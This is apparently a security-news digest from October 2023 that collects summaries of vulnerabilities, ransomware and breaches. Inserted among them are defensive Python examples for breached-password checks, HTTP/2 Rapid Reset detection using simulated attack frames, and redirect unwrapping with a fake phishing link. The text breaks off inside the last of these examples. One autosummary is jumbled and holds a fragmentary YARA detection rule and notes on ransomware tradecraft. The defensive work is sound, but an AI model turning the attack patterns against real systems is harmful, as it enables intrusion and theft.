            2023-10-11 https://thehackernews.com/2023/10/us-cybersecurity-agency-warns-of.html
            The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Tuesday added a high-severity flaw in Adobe Acrobat Reader to its Known Exploited Vulnerabilities (KEV) catalog, citing evidence of active exploitation. Tracked as CVE-2023-21608 (CVSS score: 7.8), the vulnerability has been described as a use-after-free bug that can be exploited to achieve remote code execution (RCE) with the "

            Autosummary: "


            Take an Offensive Approach to Password Security by Continuously Monitoring for Breached Passwords

            ransomware
            2023-10-11 https://thehackernews.com/2023/10/take-offensive-approach-to-password.html
            Passwords are at the core of securing access to an organization's data. However, they also come with security vulnerabilities that stem from their inconvenience. With a growing list of credentials to keep track of, the average end-user can default to shortcuts. Instead of creating a strong and unique password for each account, they resort to easy-to-remember passwords, or use the same password "

            Autosummary: Unfortunately, many organizations lack a comprehensive system to prevent password reuse, like blocking the use of weak, breached, or high-probability passwords. Solving the password reuse security gap with Specops Password Policy Specops Password Policy gives IT administrators the ability to enforce stronger password policies in Active Directory environments and mitigate the risk of reused and compromised passwords. "
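            The check that closes the "breached password" gap can be done without the password ever leaving the host: hash the candidate with SHA-1, send only the first five hex characters of the digest as a range query, and compare the remaining suffix locally against what the range returns. The following is an added example of that mechanism; it is not Specops code and does not describe how their product works. The breached set is constructed from a few plaintexts so the example runs offline; in practice the ranges come from a breached-credential feed.

```python
"""
Added example; not Specops code and not a description of their product.
Demonstrates a k-anonymity style breached-password check: only a 5-character
SHA-1 prefix is used as the lookup key, and the 35-character suffix comparison
happens locally. The breached corpus is constructed for this example.
"""
import hashlib
from collections import defaultdict
from typing import Dict, List, Tuple

# Constructed "already breached" corpus with made-up seen counts, standing in
# for a real feed. Never use a list like this as a reference for real passwords.
CONSTRUCTED_BREACHED = {
    "Password123": 120_000,
    "Summer2023!": 3_400,
    "Welcome1": 58_000,
    "letmein": 250_000,
}


def sha1_upper(password: str) -> str:
    """Hex SHA-1 of the UTF-8 password, upper-cased like range-query feeds publish it."""
    return hashlib.sha1(password.encode("utf-8")).hexdigest().upper()


def build_ranges(corpus: Dict[str, int]) -> Dict[str, List[Tuple[str, int]]]:
    """Index the corpus by 5-hex-char prefix -> [(35-char suffix, seen_count)]."""
    ranges: Dict[str, List[Tuple[str, int]]] = defaultdict(list)
    for pw, count in corpus.items():
        digest = sha1_upper(pw)
        ranges[digest[:5]].append((digest[5:], count))
    return ranges


RANGES = build_ranges(CONSTRUCTED_BREACHED)


def range_query(prefix: str) -> List[Tuple[str, int]]:
    """The only thing that would leave the host: a 5-character prefix. Returns every suffix in that range."""
    if len(prefix) != 5:
        raise ValueError("range queries take exactly 5 hex characters")
    return RANGES.get(prefix, [])


def breach_count(password: str) -> int:
    """How many times the password appears in the breached corpus (0 if never)."""
    digest = sha1_upper(password)
    prefix, suffix = digest[:5], digest[5:]
    for candidate_suffix, count in range_query(prefix):
        if candidate_suffix == suffix:
            return count
    return 0


def evaluate_password(password: str, min_length: int = 12) -> Tuple[bool, str]:
    """Policy decision: a breached password is rejected regardless of length or complexity."""
    seen = breach_count(password)
    if seen:
        return False, f"rejected: appears in breach data ({seen} times)"
    if len(password) < min_length:
        return False, f"rejected: shorter than {min_length} characters"
    return True, "accepted"


if __name__ == "__main__":
    for candidate in ("Password123", "Tr0ub4dor&3", "correct horse battery staple"):
        ok, reason = evaluate_password(candidate)
        print(f"{candidate!r}: {reason}")
```

            The continuous-monitoring part the article argues for is the same check run again on the stored hashes whenever the breached feed is updated, not only at password-change time; a password that was fine in January is not fine once it appears in a new dump.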


            Microsoft Releases October 2023 Patches for 103 Flaws, Including 2 Active Exploits

            exploits
            2023-10-11 https://thehackernews.com/2023/10/microsoft-releases-october-2023-patches.html
            Microsoft has released its Patch Tuesday updates for October 2023, addressing a total of 103 flaws in its software, two of which have come under active exploitation in the wild. Of the 103 flaws, 13 are rated Critical and 90 are rated Important in severity. This is apart from 18 security vulnerabilities addressed in its Chromium-based Edge browser since the second Tuesday of September. The two "

            Autosummary: "


            Microsoft Warns of Nation-State Hackers Exploiting Critical Atlassian Confluence Vulnerability

            exploits government
            2023-10-11 https://thehackernews.com/2023/10/microsoft-warns-of-nation-state-hackers.html
            Microsoft has linked the exploitation of a recently disclosed critical flaw in Atlassian Confluence Data Center and Server to a nation-state actor it tracks as Storm-0062 (aka DarkShadow or Oro0lxy). The tech giant's threat intelligence team said it observed in-the-wild abuse of the vulnerability since September 14, 2023. "CVE-2023-22515 is a critical privilege escalation vulnerability in "

            Autosummary: "


            6 steps to getting the board on board with your cybersecurity program

            ciber
            2023-10-11 https://www.welivesecurity.com/en/business-security/6-steps-getting-board-on-board-cybersecurity-program/
            How CISOs and their peers can better engage with boards to get long-term buy-in for strategic initiatives "

            Autosummary: In Europe, EU security agency ENISA warned in 2022 of a surge in zero-day exploits, ransomware-as-a-service, hackers-for-hire, supply chain attacks and social engineering. In fact, according to one study, only two-fifths (39%) of security decision makers believe their company leadership truly understands the role cybersecurity plays in business success. Thus, they can create that security-by-design culture that every organization should aspire to, and in so doing prove to sceptical boards that security should be embedded into every part of the business. "


            CISA adds Adobe Acrobat Reader flaw to its Known Exploited Vulnerabilities catalog

            exploits
            2023-10-11 https://securityaffairs.com/152361/hacking/cisa-adds-adobe-acrobat-reader-flaw-known-exploited-vulnerabilities-catalog.html

            US CISA added the flaw CVE-2023-21608 in Adobe Acrobat Reader to its Known Exploited Vulnerabilities catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added five new flaws to its Known Exploited Vulnerabilities Catalog, including a high-severity flaw (CVE-2023-21608) (CVSS score: 7.8) in Adobe Acrobat Reader. The flaw is a use-after-free issue; an attacker can trigger it to achieve […]

            The post CISA adds Adobe Acrobat Reader flaw to its Known Exploited Vulnerabilities catalog appeared first on Security Affairs.

            "

            Autosummary: "


            Air Europa data breach exposed customers’ credit cards

            financial
            2023-10-11 https://securityaffairs.com/152316/data-breach/airline-air-europa-data-breach.html

            Airline Air Europa disclosed a data breach and warned customers to cancel their credit cards after threat actors accessed their card information. Air Europa is a Spanish airline and a subsidiary of the Globalia Corporation. It operates as a full-service carrier, providing passenger and cargo services to various destinations, both domestic and international. Air Europa […]

            The post Air Europa data breach exposed customers’ credit cards appeared first on Security Affairs.

            "

            Autosummary: By Pierluigi Paganini, October 11, 2023. "


            Microsoft Patch Tuesday updates for October 2023 fixed three actively exploited zero-day flaws

            exploits
            2023-10-11 https://securityaffairs.com/152294/security/microsoft-patch-tuesday-october-2023.html

            Microsoft Patch Tuesday security updates for October 2023 fixed three actively exploited zero-day vulnerabilities. Microsoft Patch Tuesday security updates for October 2023 addressed a total of 103 vulnerabilities in Microsoft Windows and Windows Components; Exchange Server; Office and Office Components; ASP.NET Core and Visual Studio; Azure; Microsoft Dynamics; and Skype for Business. Three of the […]

            The post Microsoft Patch Tuesday updates for October 2023 fixed three actively exploited zero-day flaws appeared first on Security Affairs.

            "

            Autosummary: By Pierluigi Paganini, October 11, 2023. "


            "Extremely dangerous" Hurricane Lidia hits Mexico"s Pacific coast

            latam
            2023-10-11 https://www.bbc.co.uk/news/world-latin-america-67073955?at_medium=RSS&at_campaign=KARANGA
            Hurricane Lidia barrelled into Mexico's Pacific coastline with wind speeds of up to 140mph (220km/h). "

            Autosummary: "


            New "HTTP/2 Rapid Reset" zero-day attack breaks DDoS records

            exploits
            2023-10-10 https://www.bleepingcomputer.com/news/security/new-http-2-rapid-reset-zero-day-attack-breaks-ddos-records/
            A new DDoS (distributed denial of service) technique named "HTTP/2 Rapid Reset" has been actively exploited as a zero-day since August, breaking all previous records in magnitude. [...] "

            Autosummary: "We've kept the information restricted until today to give as many security vendors as possible the opportunity to react," explained Cloudflare. "However, at some point, the responsible thing becomes to publicly disclose zero-day threats like this." "


            Microsoft October 2023 Patch Tuesday fixes 3 zero-days, 104 flaws

            exploits
            2023-10-10 https://www.bleepingcomputer.com/news/microsoft/microsoft-october-2023-patch-tuesday-fixes-3-zero-days-104-flaws/
            Today is Microsoft's October 2023 Patch Tuesday, with security updates for 104 flaws, including three actively exploited zero-day vulnerabilities. [...] "

            Autosummary: The number of bugs in each vulnerability category is listed below:

            26 Elevation of Privilege Vulnerabilities
            3 Security Feature Bypass Vulnerabilities
            45 Remote Code Execution Vulnerabilities
            12 Information Disclosure Vulnerabilities
            17 Denial of Service Vulnerabilities
            1 Spoofing Vulnerability

            The total count of 104 flaws does not include one Chromium vulnerability tracked as CVE-2023-5346, which was fixed by Google on October 3rd and ported to Microsoft Edge. "


            Air Europa data breach: Customers warned to cancel credit cards

            financial
            2023-10-10 https://www.bleepingcomputer.com/news/security/air-europa-data-breach-customers-warned-to-cancel-credit-cards/
            Spanish airline Air Europa, the country's third-largest airline and a member of the SkyTeam alliance, warned customers on Monday to cancel their credit cards after attackers accessed their card information in a recent data breach. [...] "

            Autosummary: "


            Microsoft to kill off VBScript in Windows to block malware delivery

            exploits
            2023-10-10 https://www.bleepingcomputer.com/news/security/microsoft-to-kill-off-vbscript-in-windows-to-block-malware-delivery/
            Microsoft is planning to phase out VBScript in future Windows releases after 30 years of use, making it an on-demand feature until it is removed. [...] "

            Autosummary: "


            Mirai DDoS malware variant expands targets with 13 router exploits

            exploits
            2023-10-10 https://www.bleepingcomputer.com/news/security/mirai-ddos-malware-variant-expands-targets-with-13-router-exploits/
            A Mirai-based DDoS (distributed denial of service) malware botnet tracked as IZ1H9 has added thirteen new payloads to target Linux-based routers and routers from D-Link, Zyxel, TP-Link, TOTOLINK, and others. [...] "

            Autosummary: "


            Microsoft Exchange gets ‘better’ patch to mitigate critical bug

            exploits
            2023-10-10 https://www.bleepingcomputer.com/news/security/microsoft-exchange-gets-better-patch-to-mitigate-critical-bug/
            The Exchange Team asked admins to deploy a new and "better" patch for a critical Microsoft Exchange Server vulnerability initially addressed in August. [...] "

            Autosummary: "


            #StopRansomware: AvosLocker Ransomware (Update)

            exploits ransomware
            2023-10-10 https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-284a

            SUMMARY

            Note: This joint Cybersecurity Advisory (CSA) is part of an ongoing #StopRansomware effort to publish advisories for network defenders that detail various ransomware variants and ransomware threat actors. These #StopRansomware advisories include recently and historically observed tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) to help organizations protect against ransomware. Visit stopransomware.gov to see all #StopRansomware advisories and to learn more about other ransomware threats and no-cost resources.

            The Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security Agency (CISA) are releasing this joint Cybersecurity Advisory (CSA) to disseminate known IOCs, TTPs, and detection methods associated with the AvosLocker variant identified through FBI investigations as recently as May 2023. AvosLocker operates under a ransomware-as-a-service (RaaS) model. AvosLocker affiliates have compromised organizations across multiple critical infrastructure sectors in the United States, affecting Windows, Linux, and VMware ESXi environments. AvosLocker affiliates compromise organizations’ networks by using legitimate software and open-source remote system administration tools. AvosLocker affiliates then use exfiltration-based data extortion tactics with threats of leaking and/or publishing stolen data.

            This joint CSA updates the March 17, 2022, AvosLocker ransomware joint CSA, Indicators of Compromise Associated with AvosLocker ransomware, released by FBI and the Department of the Treasury’s Financial Crimes Enforcement Network (FinCEN). This update includes IOCs and TTPs not included in the previous advisory and a YARA rule FBI developed after analyzing a tool associated with an AvosLocker compromise.

            FB "

            Autosummary: YARA Rule rule NetMonitor { meta: author = "FBI" source = "FBI" sharing = "TLP:CLEAR" status = "RELEASED" description = "Yara rule to detect NetMonitor.exe" category = "MALWARE" creation_date = "2023-05-05" strings: $rc4key = {11 4b 8c dd 65 74 22 c3} $op0 =Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by CISA and FBI.Specifically, affiliates use: Remote system administration tools—Splashtop Streamer, Tactical RMM, PuTTy, AnyDesk, PDQ Deploy, and Atera Agent—as backdoor access vectors [T1133]. REPORTING The FBI is seeking any information that can be shared, to include boundary logs showing communication to and from foreign IP addresses, a sample ransom note, communications with AvosLocker affiliates, Bitcoin wallet information, decryptor files, and/or a benign sample of an encrypted file. Table 3: AvosLocker Affiliates ATT&CK Techniques for Initial Access Initial Access Technique Title ID Use External Remote Services T1133 AvosLocker affiliates use remote system administration tools—Splashtop Streamer, Tactical RMM, PuTTy, AnyDesk, PDQ Deploy, and Atera Agent—to access backdoor access vectors. to maintain and retain multiple copies of sensitive or proprietary data and servers in a physically separate, segmented, and secure location (e.g., hard drive, storage device, or the cloud).CISA and FBI do not endorse any commercial entity, product, company, or service, including any entities, products, or services linked within this document.Implement a recovery plan to maintain and retain multiple copies of sensitive or proprietary data and servers in a physically separate, segmented, and secure location (e.g., hard drive, storage device, or the cloud). 
This joint CSA updates the March 17, 2022, AvosLocker ransomware joint CSA, Indicators of Compromise Associated with AvosLocker ransomware, released by FBI and the Department of the Treasury’s Financial Crimes Enforcement Network (FinCEN). FBI has also observed AvosLocker affiliates: Use custom PowerShell [T1059.001] and batch ( .bat ) scripts [T1059.003] for lateral movement, privilege escalation, and disabling antivirus software.e8} condition: uint16(0) == 0x5A4D and filesize < 50000 and any of them } MITRE ATT&CK TACTICS AND TECHNIQUES See Tables 3-7 for all referenced threat actor tactics and techniques in this advisory. Download the PDF version of this report: For a downloadable copy of IOCs, see: TECHNICAL DETAILS Note: This advisory uses the MITRE ATT&CK for Enterprise framework, version 13. "


            HTTP/2 Rapid Reset Zero-Day Vulnerability Exploited to Launch Record DDoS Attacks

            exploits
            2023-10-10 https://thehackernews.com/2023/10/http2-rapid-reset-zero-day.html
            Amazon Web Services (AWS), Cloudflare, and Google on Tuesday said they took steps to mitigate record-breaking distributed denial-of-service (DDoS) attacks that relied on a novel technique called HTTP/2 Rapid Reset. The layer 7 attacks were detected in late August 2023, the companies said in a coordinated disclosure. The cumulative susceptibility to this attack is being tracked as CVE-2023-44487, "

            Autosummary: "The first variant does not immediately cancel the streams, but instead opens a batch of streams at once, waits for some time, and then cancels those streams and then immediately opens another large batch of new streams," Juho Snellman and Daniele Lamartino said. "
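The technique in the blurb, and the batched variant Snellman and Lamartino describe, as an added example that is not from the disclosure or from any of the providers' code: a per-connection sliding-window counter of client RST_STREAM frames, one common shape of the mitigation deployed for this attack (drop a connection whose reset count is excessive), run over constructed frame sequences for the classic attack, the batched variant and a benign client. The 1 s window, 50-reset floor and 50% reset ratio are assumptions chosen for illustration, as are all frame timings; the frame type codes are the RFC 9113 values.

```python
"""Per-connection sliding-window detector for HTTP/2 Rapid Reset abuse."""
from collections import deque
from dataclasses import dataclass
from typing import Iterable, Optional

# HTTP/2 frame type codes from RFC 9113 (real values; every frame below is constructed).
HEADERS = 0x1
RST_STREAM = 0x3


@dataclass(frozen=True)
class Frame:
    t: float        # arrival time in seconds since the connection opened
    ftype: int      # HEADERS opens a stream, RST_STREAM cancels it
    stream_id: int  # client-initiated streams carry odd identifiers


class RapidResetGuard:
    """Flag a connection whose client resets most of the streams it opens.

    Thresholds are assumptions for this example, not any vendor's defaults:
    within `window` seconds the client must have sent at least `min_resets`
    RST_STREAM frames, and those resets must exceed `max_ratio` of the
    streams it opened in the same window. Resets, not concurrency, are what
    to count: each RST_STREAM frees a slot, so SETTINGS_MAX_CONCURRENT_STREAMS
    alone never trips on this attack.
    """

    def __init__(self, window: float = 1.0, min_resets: int = 50, max_ratio: float = 0.5):
        self.window = window
        self.min_resets = min_resets
        self.max_ratio = max_ratio
        self._events: deque = deque()  # (arrival time, frame type) of client stream events

    def observe(self, frame: Frame) -> bool:
        """Record one frame; return True when the connection should be closed."""
        if frame.stream_id % 2 == 0 or frame.ftype not in (HEADERS, RST_STREAM):
            return False  # server-initiated streams and other frame types are ignored
        while self._events and frame.t - self._events[0][0] > self.window:
            self._events.popleft()  # drop events that have left the window
        self._events.append((frame.t, frame.ftype))
        if frame.ftype != RST_STREAM:
            return False  # only a reset can push the connection over the limit
        resets = sum(1 for _, ft in self._events if ft == RST_STREAM)
        opened = sum(1 for _, ft in self._events if ft == HEADERS)
        return resets >= self.min_resets and resets > self.max_ratio * max(opened, 1)


def rapid_reset(streams: int, gap: float = 0.001) -> list:
    """Classic pattern: open a stream and cancel it at once, `streams` times."""
    frames, t = [], 0.0
    for i in range(streams):
        sid = 2 * i + 1
        frames.append(Frame(t, HEADERS, sid))
        frames.append(Frame(t + gap / 2, RST_STREAM, sid))
        t += gap
    return frames


def batched_variant(batch: int, batches: int, pause: float) -> list:
    """Variant from the disclosure: open a batch, wait, cancel it, open the next."""
    frames, t, sid = [], 0.0, 1
    for _ in range(batches):
        opened = []
        for _ in range(batch):
            frames.append(Frame(t, HEADERS, sid))
            opened.append(sid)
            sid += 2
        t += pause
        for s in opened:
            frames.append(Frame(t, RST_STREAM, s))
        t += 0.001
    return frames


def browser_like(streams: int, resets: int, spacing: float) -> list:
    """Benign client: many requests, a handful cancelled (e.g. user navigated away)."""
    frames, t = [], 0.0
    for i in range(streams):
        sid = 2 * i + 1
        frames.append(Frame(t, HEADERS, sid))
        if i < resets:
            frames.append(Frame(t + spacing / 2, RST_STREAM, sid))
        t += spacing
    return frames


def first_flag(frames: Iterable[Frame], guard: Optional[RapidResetGuard] = None) -> Optional[int]:
    """Index of the frame on which the guard closes the connection, or None."""
    guard = guard or RapidResetGuard()
    for idx, frame in enumerate(frames):
        if guard.observe(frame):
            return idx
    return None


if __name__ == "__main__":
    for name, frames in [("rapid reset", rapid_reset(200)),
                         ("batched variant", batched_variant(100, 3, 0.2)),
                         ("slow resets", rapid_reset(200, gap=0.05)),
                         ("browser-like", browser_like(200, 5, 0.01))]:
        print(f"{name:16s} -> {first_flag(frames)}")
```

The batched variant is why the check is a count over a window rather than a test for "reset immediately after open": its resets arrive well after the HEADERS frames, but they still pile up in the same second. A slow trickle of resets stays under the floor, and a browser cancelling a few navigations never approaches it. A real server would apply the check before dispatching the request for each new stream, since the cost the attack imposes is the work already started for cancelled streams.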


            libcue Library Flaw Opens GNOME Linux Systems Vulnerable to RCE Attacks

            Linux
            2023-10-10 https://thehackernews.com/2023/10/libcue-library-flaw-opens-gnome-linux.html
            A new security flaw has been disclosed in the libcue library impacting GNOME Linux systems that could be exploited to achieve remote code execution (RCE) on affected hosts. Tracked as CVE-2023-43641 (CVSS score: 8.8), the issue is described as a case of memory corruption in libcue, a library designed for parsing cue sheet files. It impacts versions 2.2.1 and prior. libcue is incorporated into "

            Autosummary: "Vulnerabilities like this are often the starting point for a "one-click" exploit, which compromises the victim’s device when they visit a malicious website," security researcher Man Yue Mo said. "


            Citrix Devices Under Attack: NetScaler Flaw Exploited to Capture User Credentials

            exploits
            2023-10-10 https://thehackernews.com/2023/10/citrix-devices-under-attack-netscaler.html
            A recently disclosed critical flaw in Citrix NetScaler ADC and Gateway devices is being exploited by threat actors to conduct a credential harvesting campaign. IBM X-Force, which uncovered the activity last month, said adversaries exploited "CVE-2023-3519 to attack unpatched NetScaler Gateways to insert a malicious script into the HTML content of the authentication web page to capture user "

            Autosummary: The disclosure comes as Fortinet FortiGuard Labs uncovered an updated version of the IZ1H9 Mirai-based DDoS campaign that makes use of a revised list of exploits targeting various flaws in IP cameras and routers from D-Link, Geutebrück, Korenix, Netis, Sunhillo SureLine, TP-Link, TOTOLINK, Yealink, and Zyxel. "


            Warning AI industry could use as much energy as the Netherlands

            industry
            2023-10-10 https://www.bbc.co.uk/news/technology-67053139?at_medium=RSS&at_campaign=KARANGA
            A new study looks at the environmental impact of artificial intelligence if current trends continue. "

            Autosummary: "


            HelloKitty ransomware source code leaked on hacking forum

            exploits ransomware
            2023-10-09 https://www.bleepingcomputer.com/news/security/hellokitty-ransomware-source-code-leaked-on-hacking-forum/
            A threat actor has leaked the complete source code for the first version of the HelloKitty ransomware on a Russian-speaking hacking forum, claiming to be developing a new, more powerful encryptor. [...] "

            Autosummary: A threat actor named Gookee has been previously associated with malware and hacking activity, attempting to sell access to Sony Network Japan in 2020, linked to a Ransomware-as-a-Service operation called "Gookee Ransomware," and trying to sell malware source code on a hacker forum. "


            ALPHV ransomware gang claims attack on Florida circuit court

            exploits ransomware
            2023-10-09 https://www.bleepingcomputer.com/news/security/alphv-ransomware-gang-claims-attack-on-florida-circuit-court/
            The ALPHV (BlackCat) ransomware gang has claimed an attack that affected state courts across Northwest Florida (part of the First Judicial Circuit) last week. [...] "

            Autosummary: "This event will significantly affect court operations across the Circuit, impacting courts in Escambia, Okaloosa, Santa Rosa, and Walton counties, for an extended period," a statement published on the court’s website says. "


            GNOME Linux systems exposed to RCE attacks via file downloads

            Linux
            2023-10-09 https://www.bleepingcomputer.com/news/security/gnome-linux-systems-exposed-to-rce-attacks-via-file-downloads/
            A memory corruption vulnerability in the open-source libcue library can let attackers execute arbitrary code on GNOME Linux systems. [...] "

            Autosummary: While successful exploitation of CVE-2023-43641 requires tricking a potential victim into downloading a .cue file, admins are advised to patch systems and mitigate the risks posed by this security flaw, as it provides code execution on devices running the latest releases of widely used Linux distros, including Debian, Fedora, and Ubuntu. "


            AI sneak attacks, location spying, and definitely not malware, or, what one teenager fears online: Lock and Code S04E21

            exploits
            2023-10-09 https://www.malwarebytes.com/blog/podcast/2023/10/ai-sneak-attacks-location-spying-and-definitely-not-malware-lock-and-code-s04e21

            Categories: Podcast

            This week on the Lock and Code podcast, we speak with Bay Area teenager Nitya Sharma—for the second year in a row—about what she’s most worried about online and what she does to stay safe.

            (Read more...)

            The post AI sneak attacks, location spying, and definitely not malware, or, what one teenager fears online: Lock and Code S04E21 appeared first on Malwarebytes Labs.

            "

            Autosummary: Titled "Everyone’s afraid of the internet and no one’s sure what to do about it," Malwarebytes’ new report shows that 81 percent of Gen Z worries about having personal, private information exposed—like their sexual orientations, personal struggles, medical history, and relationship issues (compared to 75 percent of non-Gen Zers). "


            Cybercriminals Using EvilProxy Phishing Kit to Target Senior Executives in U.S. Firms

            financial ciber
            2023-10-09 https://thehackernews.com/2023/10/cybercriminals-using-evilproxy-phishing.html
            Senior executives working in U.S.-based organizations are being targeted by a new phishing campaign that leverages a popular adversary-in-the-middle (AiTM) phishing toolkit named EvilProxy to conduct credential harvesting and account takeover attacks. Menlo Security said the activity started in July 2023, primarily singling out banking and financial services, insurance, property management and "

            Autosummary: In the latest set of attacks documented by Menlo Security, victims are sent phishing emails with a deceptive link pointing to Indeed, which, in turn, redirects the individual to an EvilProxy page to harvest the credentials entered. "


            High-Severity Flaws in ConnectedIO’s 3G/4G Routers Raise Concerns for IoT Security

            industry
            2023-10-09 https://thehackernews.com/2023/10/high-severity-flaws-in-connectedios.html
            Multiple high-severity security vulnerabilities have been disclosed in ConnectedIO’s ER2000 edge routers and the cloud-based management platform that could be exploited by malicious actors to execute malicious code and access sensitive data. "An attacker could have leveraged these flaws to fully compromise the cloud infrastructure, remotely execute code, and leak all customer and device "

            Autosummary: Flaws have also been unearthed in the communication protocol (i.e., MQTT) used between the devices and the cloud, including the use of hard-coded authentication credentials, that could be used to register a rogue device and access MQTT messages containing device identifiers, Wi-Fi settings, SSIDs, and passwords from routers. "


            Gaza-Linked Cyber Threat Actor Targets Israeli Energy and Defense Sectors

            industry
            2023-10-09 https://thehackernews.com/2023/10/gaza-linked-cyber-threat-actor-targets.html
            A Gaza-based threat actor has been linked to a series of cyber attacks aimed at Israeli private-sector energy, defense, and telecommunications organizations. Microsoft, which revealed details of the activity in its fourth annual Digital Defense Report, is tracking the campaign under the name Storm-1133. "We assess this group works to further the interests of Hamas, a Sunni militant group that is "

            Autosummary: "


            Third Flagstar Bank data breach since 2021 affects 800,000 customers

            financial
            2023-10-08 https://www.bleepingcomputer.com/news/security/third-flagstar-bank-data-breach-since-2021-affects-800-000-customers/
            Flagstar Bank is warning that over 800,000 US customers had their personal information stolen by cybercriminals due to a breach at a third-party service provider. [...] "

            Autosummary: Based on the data samples posted by the ransomware gang, the hackers managed to steal customer and employee information, including names, addresses, phone numbers, tax records, and SSNs. "


            MGM Resorts says ransomware attack cost $100 million, data stolen

            exploits ransomware
            2023-10-06 https://www.bleepingcomputer.com/news/security/mgm-resorts-says-ransomware-attack-cost-100-million-data-stolen/
            MGM Resorts reveals that last month’s cyberattack cost the company $100 million and allowed the hackers to steal customers’ personal information. [...] "

            Autosummary: A separate notice was sent to impacted individuals yesterday, informing them that the following details have been exposed to the cyber criminals, varying by individual: full name, phone number, email address, postal address, gender, date of birth, driver’s license, Social Security Number (SSN), and passport number. MGM concludes that its investigation has not unearthed signs that the incident exposed customer passwords, bank account numbers, and payment card information. "


            FTC warns of ‘staggering’ losses to social media scams since 2021

            financial
            2023-10-06 https://www.bleepingcomputer.com/news/security/ftc-warns-of-staggering-losses-to-social-media-scams-since-2021/
            The Federal Trade Commission says Americans have lost at least $2.7 billion to social media scams since 2021, with the real number likely many times larger due to unreported incidents.  [...] "

            Autosummary: The FTC advised U.S. consumers today to exercise caution and safeguard themselves against such scams, encouraging individuals at risk to restrict their social media posts and contacts, reaching out directly by phone if someone, even a purported friend or relative, solicits money through social media. "


            Genetics firm 23andMe says user data stolen in credential stuffing attack

            industry
            2023-10-06 https://www.bleepingcomputer.com/news/security/genetics-firm-23andme-says-user-data-stolen-in-credential-stuffing-attack/
            23andMe has confirmed to BleepingComputer that it is aware of user data from its platform circulating on hacker forums and attributes the leak to a credential-stuffing attack. [...] "

            Autosummary: "


            MGM Resorts ransomware attack led to $100 million loss, data theft

            exploits ransomware
            2023-10-06 https://www.bleepingcomputer.com/news/security/mgm-resorts-ransomware-attack-led-to-100-million-loss-data-theft/
            MGM Resorts reveals that last month’s cyberattack cost the company $100 million and allowed the hackers to steal customers’ personal information. [...] "

            Autosummary: A separate notice was sent to impacted individuals yesterday, informing them that the following details have been exposed to the cyber criminals, varying by individual: full name, phone number, email address, postal address, gender, date of birth, driver’s license, Social Security Number (SSN), and passport number. MGM concludes that its investigation has not unearthed signs that the incident exposed customer passwords, bank account numbers, and payment card information. "


            Blackbaud agrees to $49.5 million settlement for ransomware data breach

            financial exploits ransomware
            2023-10-06 https://www.bleepingcomputer.com/news/security/blackbaud-agrees-to-495-million-settlement-for-ransomware-data-breach/
            Cloud computing provider Blackbaud reached a $49.5 million agreement with attorneys general from 49 U.S. states to settle a multi-state investigation of a May 2020 ransomware attack and the resulting data breach. [...] "

            Autosummary: As part of the settlement, Blackbaud also has to: implement and maintain a breach response plan; provide appropriate assistance to its customers in the event of a breach; report security incidents to its CEO and board and provide enhanced employee training; implement personal information safeguards and controls requiring total database encryption and dark web monitoring; improve defenses via network segmentation, patch management, intrusion detection, firewalls, access controls, logging and monitoring, and penetration testing; and allow third-party assessments of its compliance with the settlement for seven years. Ransomware attack fallout: in its 2020 Q3 quarterly report, the company revealed three years ago that at least 43 state Attorneys General and the District of Columbia were looking into the incident. "


            Amazon Prime email scammer snatches defeat from the jaws of victory

            financial
            2023-10-06 https://www.malwarebytes.com/blog/news/2023/10/amazon-prime

            Categories: News

            Categories: Scams

            A very convincing Amazon Prime scam landed in our mail server today and...went straight to spam. Here’s why.

            (Read more...)

            The post Amazon Prime email scammer snatches defeat from the jaws of victory appeared first on Malwarebytes Labs.

            "

            Autosummary: It’s about a malicious email that failed hard because, for all that it got right, it got the most important thing wrong, all but guaranteeing itself an inevitable, rapid, one-way trip to the spam trap. The premise is plausible, the colours look right, the logo does too, and the sign off, "Amazon.co.uk Customer Service", correctly placed me in the UK. Because its address might look weird to an email scanning engine, or an eagle-eyed recipient, the furniture site is reached via an open redirect on Russia’s answer to Facebook, VKontakte, which is a large and well established website that won’t ring any alarm bells. "
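Both the EvilProxy campaign above, which routed victims through a link on Indeed, and this scam, which used an open redirect on VKontakte, rely on the same trick: a link on a trusted domain whose query string forwards the visitor to the attacker's site. As an added example that is not from Menlo Security's or Malwarebytes' write-ups, the helper below peels redirect-style query parameters off a link, hop by hop, to find where it actually lands. Every URL in it is constructed; the hypothetical `jobs.example.com` and `social.example.net` stand in for the abused sites, with no claim about the real services' URL formats.

```python
"""Follow redirect-style query parameters to find where a link really lands."""
from typing import Optional
from urllib.parse import parse_qsl, unquote, urlsplit


def _as_url(value: str) -> Optional[str]:
    """Return `value` as an absolute http(s) URL if it is one.

    Tolerates up to two extra layers of percent-encoding (parse_qsl already
    removed one) and treats a protocol-relative '//host/path' as https.
    """
    v = value.strip()
    for _ in range(3):
        candidate = "https:" + v if v.startswith("//") else v
        parts = urlsplit(candidate)
        if parts.scheme in ("http", "https") and parts.hostname:
            return candidate
        decoded = unquote(v)
        if decoded == v:
            return None  # nothing left to decode and still not a URL
        v = decoded
    return None


def _same_site(a: str, b: str) -> bool:
    """Naive same-site test by DNS suffix; use a public suffix list in production."""
    return a == b or a.endswith("." + b) or b.endswith("." + a)


def redirect_chain(url: str, max_hops: int = 3) -> list:
    """Hosts visited by peeling nested redirect parameters, starting with the link's own host.

    Any query value that parses as an off-site URL counts as a redirect target,
    whatever the parameter is called: the name belongs to the redirecting site
    and changes from one abused service to the next.
    """
    hosts = []
    current = url
    for _ in range(max_hops + 1):
        parts = urlsplit(current)
        host = parts.hostname or ""
        hosts.append(host)
        nxt = None
        for _key, value in parse_qsl(parts.query, keep_blank_values=True):
            target = _as_url(value)
            if target and not _same_site(urlsplit(target).hostname or "", host):
                nxt = target
                break
        if nxt is None:
            break
        current = nxt
    return hosts


def lands_offsite(url: str) -> bool:
    """True when the link's query string forwards the visitor to another site."""
    return len(redirect_chain(url)) > 1


# Constructed sample links (hypothetical hosts, not real campaign URLs).
SAMPLE_LINKS = {
    # job-board style redirector handing off to a credential-harvesting host
    "job_board": "https://jobs.example.com/r?jk=abc&url=https%3A%2F%2Flogin.evil.test%2Fauth%3Fuser%3D1",
    # social-network open redirect, protocol-relative, chaining through a second site
    "social": "https://social.example.net/away.php?to=%2F%2Fshop.example.org%2Fgo"
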